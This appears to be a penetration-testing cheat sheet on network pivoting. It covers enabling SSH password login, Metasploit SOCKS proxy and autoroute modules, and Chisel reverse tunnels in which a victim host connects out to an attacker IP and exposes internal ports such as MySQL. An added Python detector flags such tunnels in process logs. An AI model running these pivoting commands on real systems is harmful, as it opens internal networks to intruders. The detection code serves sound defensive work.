Network Forwarding

SSH

Enable password authentication

sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config

Restart the SSH service

sudo systemctl restart ssh.service

Metasploit

Use proxy

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
# matching proxychains.conf entry: socks4 127.0.0.1 1080
set version 4a
exploit

Autoroute

use multi/manage/autoroute
set session 1
exploit

Check proxy

netstat -an | grep :1080

Chisel

Socks Proxy

# Attacker
chisel server -p 8080 --socks5 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:1080:socks

# sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080

Port forwarding, attacker port 3306 (R:3306) -> victim 3306 (127.0.0.1:3306/tcp).

# Attacker
chisel server -p 8080 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:3306:127.0.0.1:3306/tcp
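
A defender's view of the Chisel commands above, as an added example (not code from the original page or from the Chisel project): it flags process command lines that carry a reverse remote (R:...) by argument shape rather than by binary name. The sample command lines, the addresses and the name find_reverse_tunnels are constructed for illustration, and only the two remote forms shown on this page are parsed.

```python
import re

# Reverse remotes in the two forms shown on this page:
#   R:<listen-port>:socks
#   R:<listen-port>:<target-host>:<target-port>[/tcp|/udp]
REMOTE_RE = re.compile(
    r"^R:(?P<listen>\d{1,5}):"
    r"(?:(?P<socks>socks)|(?P<host>[^:/\s]+):(?P<port>\d{1,5}))"
    r"(?:/(?P<proto>tcp|udp))?$"
)
SERVER_RE = re.compile(r"^(?:https?://)?[^\s:/]+:\d{1,5}$")

# Constructed process-creation command lines (documentation-range addresses).
SAMPLE_CMDLINES = [
    r".\chisel.exe client 203.0.113.5:8080 R:1080:socks",
    r"C:\Users\Public\updater.exe client 203.0.113.5:8080 R:3306:127.0.0.1:3306/tcp",
    "ssh -L 8080:127.0.0.1:80 user@192.0.2.10",
    "mysql --host 127.0.0.1 --port 3306",
]


def find_reverse_tunnels(cmdline):
    """Return the reverse remotes carried by one command line.

    Keys on argument shape (client <server:port> R:...), not the binary
    name, so a renamed executable is still reported.
    """
    tokens = cmdline.split()
    if "client" not in tokens:
        return []
    rest = tokens[tokens.index("client") + 1:]
    server = next((t for t in rest if SERVER_RE.match(t)), None)
    if server is None:
        return []
    hits = []
    for spec in rest:
        m = REMOTE_RE.match(spec)
        if m:
            socks = m["socks"] is not None
            hits.append({
                "server": server,
                "listen_port": int(m["listen"]),
                "kind": "socks" if socks else "forward",
                "target": None if socks else f"{m['host']}:{m['port']}",
                "proto": m["proto"] or "tcp",
            })
    return hits


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(find_reverse_tunnels(line), "<-", line)
```

Feed it the command-line field from process-creation telemetry; a hit with kind "forward" names the internal service being exposed through the tunnel.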

Last updated 1 year ago
